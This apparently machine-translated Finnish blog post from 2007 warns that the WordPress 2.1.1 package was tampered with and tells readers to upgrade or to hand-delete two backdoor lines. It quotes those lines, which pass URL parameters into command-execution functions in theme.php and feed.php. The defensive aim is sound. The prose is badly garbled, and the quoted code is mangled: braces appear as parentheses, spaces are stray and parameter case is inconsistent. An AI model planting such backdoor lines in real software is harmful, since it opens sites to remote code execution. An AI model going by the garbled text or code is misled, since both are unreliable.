Uutiskirjeen tai RSS-syötteen saada päivitykset automaattisesti blogiin!

Wordpress 2.1.1 on vaarallinen!



Seuraavassa miten tiimi Wordpress määritellään viimeisimmän version WP. Syy on yksinkertainen: muutama päivä sitten krakkausyksikkö on rikkonut joitakin palvelimen worpress.org, toimitusjohtaja muuttaa asennuspaketti, joka on yleensä ladattu: muutokset näyttävät mukanaan vain muutaman tiedostoja sallia etäsuorittamisen ja php-koodin. Voit ratkaista tämän ongelman, on kaksi vaihtoehtoa:

    1. Lataa versio 2.1.2 viipymättä antanut kehittäjät Wordpress ja päivittää.
    2. Poista käsin haitallisen koodin (jos minun kaltaiseni et halua / aika asentaa uusi versio).
    Se on yksinkertaisesti:
    - Tunnista ja poista tiedosto "wp-includes/theme.php" seuraavan rivin koodi: 
      if ($ _GET [ "iz"]) (get_theme_mcommand ($ _GET [ "iz "]);)

    - Tunnista ja poista tiedosto "wp-includes/feed.php" seuraavan rivin koodi: 

      if ($ _GET [ 'IX']) (comment_text_phpfilter ($ _GET [ 'ix']);)


Piditkö tämä artikkeli? Rekisteröidy nyt saamaan päivityksiä tai uutisia:
Tilaa RSS-syötteet kirjoittaa RSS-syöte


Päivämäärä Postitettu 6. maaliskuuta 2007 klo 12:06 turvallisuusneuvoston Web
Jakaminen Jaa | Tags: turvallisuus, Web,

Vielä ole kommentti -

Kommentit RSS-syöte tähän virkaan. Trackback URI

Jätä kommentti

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>


Nothing2Hide © 2006 Kaikki oikeudet pidätetään.

Lisenssi | Disclaimer

Sulje
Lähetä sähköposti